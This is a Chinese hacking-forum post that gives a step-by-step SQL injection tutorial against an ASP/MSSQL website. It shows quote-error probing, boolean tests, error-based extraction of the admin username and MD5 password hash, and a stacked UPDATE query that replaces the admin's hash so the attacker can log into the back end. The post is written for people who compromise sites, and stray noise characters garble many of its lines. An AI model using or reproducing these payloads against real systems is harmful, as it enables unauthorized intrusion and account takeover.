经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。" O0 w8 }0 N# d$ L3 ^3 {
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
. R& c5 _) w; b1 G9 i' l测试如下:1 v( g) R1 S# `7 {/ k
http://www.tmdsb.com/news.asp?id=1218 X0 k/ ]' q1 H: P# `2 G6 d$ w9 g0 z+ f
在地址后输入单引号,显示
- p$ S8 d- P7 H" w9 FMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
x- y8 n+ w0 h( Q1 c字符串 ’’’ 之前有未闭合的引号
/ D" @9 l- H, K+ H/news/tmdws.asp,行638 t6 L i0 W) H7 t4 J: X/ T
说明没有过滤单引号且数据库是MSSQL.1 _2 |% l5 }. `6 Q5 I
and 1=1正常。and 1=2出错。肯定存在注入5 K+ ?! t! I: T! J/ l
接着输入
. {/ N. {+ w% y4 s7 D+ bhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
! }9 A$ ` |3 N' k0 }) @得到帐号为:admin
) S; t3 k6 m! G/ vhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
6 ]; Z0 l% U: C: G/ r2 e7 ^得到密码为:a4716077c2ba075c
9 g8 U1 Y/ ~# z! J/ t接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
: N+ J# m: }' M6 M命令如下 :3 o& `' q9 `% Z
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
/ ]: n0 U( X" {5 ~) g3 |这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41